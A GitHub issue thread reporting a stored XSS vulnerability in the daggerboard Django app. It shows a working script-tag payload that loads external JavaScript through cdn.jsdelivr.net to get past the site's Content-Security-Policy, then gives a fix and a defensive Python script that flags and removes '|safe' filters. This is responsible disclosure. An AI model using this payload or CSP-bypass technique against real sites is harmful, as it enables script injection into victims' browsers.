nyph-infosec / daggerboard

MIT License

XSS Vulnerability #10

Closed devhsoj closed 2 years ago

devhsoj commented 2 years ago

Upon installing & using daggerboard (which is an awesome app by the way), I came across an XSS / sanitization vulnerability I'd like to share.

In the form for adding a package to an SBOM at /admin/daggerboard/package/add/ there seems to be no form sanitization, which allowed me to input HTML.

Now this really isn't that big of a deal for django apps that deal with user input, since django will automatically sanitize data as you render it in a view / template.

However, in the template sbomscorecard.html, lines 240 - 243, the safe django template filter is in use, which tells django that the data is 'safe' to render as HTML (which honestly doesn't make any sense), allowing any user to render any HTML that they inputted into that form, on the individual SBOM views at /sbomscorecard/.

Now if you try to add an inline script tag into the input on the 'Add Package' form and visit /sbomscorecard/, it won't work due to the well put together Content-Security-Policy blocking inline scripts.

However, in the Content-Security-Policy set in place, cdn.jsdelivr.net is allowed, and jsdelivr allows you to use their services to act as a CDN for your GitHub assets (Article), which allows us to input a script tag with a source similar to https://cdn.jsdelivr.net/gh/{username}/{repo}/ which allows us to inject our javascript straight into the view at /sbomscorecard/.

Example test.js:

<script src="https://cdn.jsdelivr.net/gh/devhsoj/testing/test.js"></script>

Inputting the above text into the 'Add Package' form in the 'Package Comment' field under any SBOM, then visiting /sbomscorecard/ and visiting that same SBOM's page, will execute that test javascript which will create and display an alert with the text 'foo'.


Fixes

The fix is as simple as removing the use of the safe template filter (|safe) in the templates sbomscorecard.html, vendorscorecard.html, and change_form.html, which will disable the data being rendered as HTML.
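An added example, not code from the daggerboard project: a small Python script that flags every `{{ ... |safe }}` render in a Django template, applies the fix described above by dropping the filter, and shows what Django's default autoescaping does to injected markup (`html.escape` is used as a stand-in for `django.utils.html.escape`; the template rows, the `package.comment` field name and the placeholder URL are constructed assumptions).

```python
import html
import re
from typing import List, Tuple

# A Django variable tag: ``{{ expr }}`` optionally followed by a filter chain
# such as ``|linebreaks|safe`` (filter arguments like ``default:"-"`` allowed).
VAR_TAG_RE = re.compile(r"\{\{\s*([^}|]+?)\s*((?:\|\s*[\w:\"'-]+\s*)*)\}\}")

def _filters(chain: str) -> List[str]:
    return [f.strip() for f in chain.split("|") if f.strip()]

def find_safe_renders(template: str) -> List[Tuple[int, str]]:
    """Return (line_number, expression) for every tag whose filter chain
    contains ``safe``, i.e. is rendered as raw HTML instead of escaped text."""
    findings = []
    for lineno, line in enumerate(template.splitlines(), start=1):
        for m in VAR_TAG_RE.finditer(line):
            if "safe" in _filters(m.group(2)):
                findings.append((lineno, m.group(1).strip()))
    return findings

def strip_safe_filter(template: str) -> str:
    """The fix from the report, applied mechanically: drop ``safe`` from each
    filter chain and keep every other filter in its original order."""
    def rebuild(m):
        kept = [f for f in _filters(m.group(2)) if f != "safe"]
        return "{{ " + m.group(1).strip() + "".join("|" + f for f in kept) + " }}"
    return VAR_TAG_RE.sub(rebuild, template)

def render_autoescaped(value: str) -> str:
    """Stand-in for Django's default autoescaping (django.utils.html.escape):
    &, <, >, " and ' become entities, so markup reaches the browser as text."""
    return html.escape(value, quote=True)

# Constructed sample (assumption): a scorecard-style table where the comment
# column is user input and two rows render it with ``|safe``.
SAMPLE_TEMPLATE = """\
<td>{{ package.name }}</td>
<td>{{ package.version }}</td>
<td>{{ package.comment|safe }}</td>
<td>{{ package.comment | linebreaks | safe }}</td>
"""
# Constructed stand-in for the injected comment (placeholder host, not a real CDN).
PAYLOAD = '<script src="https://cdn.example/placeholder.js"></script>'

if __name__ == "__main__":
    for lineno, expr in find_safe_renders(SAMPLE_TEMPLATE):
        print(f"line {lineno}: {expr} is rendered with |safe")
    print(strip_safe_filter(SAMPLE_TEMPLATE), render_autoescaped(PAYLOAD))
```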

namtarb commented 2 years ago

Aha excellent find and the detailed description is much appreciated. We will fix this (see #9) and plan to add a new v1.0.1 release.

devhsoj commented 2 years ago

Awesome, thanks! Glad to be of help.